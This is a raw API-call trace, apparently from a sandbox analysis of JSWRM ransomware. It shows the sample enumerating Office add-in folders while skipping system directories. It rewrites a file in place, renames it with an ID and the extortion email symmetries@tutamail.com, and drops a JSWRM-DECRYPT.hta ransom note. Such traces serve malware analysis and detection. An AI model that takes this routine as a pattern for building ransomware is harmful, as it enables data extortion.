[0124.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0124.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.892] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18d43c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18d43c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1920897, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4eb8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.892] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0124.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0124.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0124.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.892] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15a3fea8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ab259c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f5cd, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.nl.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2=".") returned 1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="..") returned 1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="...") returned 1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="windows") returned -1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="recovery") returned -1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="perflogs") returned 1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="documents and settings") returned 1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="system volume information") returned -1 [0124.893] lstrcmpiW (lpString1="PowerViewRes.nl.xap", lpString2="msocache") returned 1 [0124.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.nl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0124.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.nl.xap", cchWideChar=19, lpMultiByteStr=0x240fc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.nl.xap", lpUsedDefaultChar=0x0) returned 19 [0124.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.nl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0124.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.nl.xap", cchWideChar=19, lpMultiByteStr=0x2413d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.nl.xap", lpUsedDefaultChar=0x0) returned 19 [0124.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0124.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0124.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\PowerViewRes.nl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\nl\\powerviewres.nl.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.894] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=325069) returned 1 [0124.895] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.895] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.906] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.906] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.907] CloseHandle (hObject=0x338) returned 1 [0124.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0124.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0124.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0124.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0124.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0124.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.908] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\PowerViewRes.nl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\nl\\powerviewres.nl.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\PowerViewRes.nl.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\nl\\powerviewres.nl.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0124.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0124.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0124.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0124.909] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15a3fea8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ab259c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f5cd, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.nl.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.909] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0124.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0124.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.910] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b71118, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0124.910] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0124.910] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0124.910] lstrcmpiW (lpString1="no", lpString2="...") returned 1 [0124.910] lstrcmpiW (lpString1="no", lpString2="windows") returned -1 [0124.910] lstrcmpiW (lpString1="no", lpString2="recovery") returned -1 [0124.910] lstrcmpiW (lpString1="no", lpString2="perflogs") returned -1 [0124.910] lstrcmpiW (lpString1="no", lpString2="documents and settings") returned 1 [0124.911] lstrcmpiW (lpString1="no", lpString2="$RECYCLE.BIN") returned 1 [0124.911] lstrcmpiW (lpString1="no", lpString2="system volume information") returned -1 [0124.911] lstrcmpiW (lpString1="no", lpString2="msocache") returned 1 [0124.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0124.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0124.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0124.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\no\\jswrm-decrypt.hta")) returned 0xffffffff [0124.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0124.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0124.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0124.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0124.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\no\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.916] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.917] CloseHandle (hObject=0x314) returned 1 [0124.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0124.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0124.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0124.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0124.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0124.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\no\\jswrm-decrypt.hta")) returned 0x20 [0124.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0124.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0124.917] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x411d5d7f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0124.917] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.917] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x411d5d7f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.917] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.917] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.917] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18f9628, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15b9737d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4258, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.917] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.917] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.917] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.917] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.917] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.918] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.918] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.918] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.918] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.918] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0124.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241218, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.918] RtlAllocateHeap 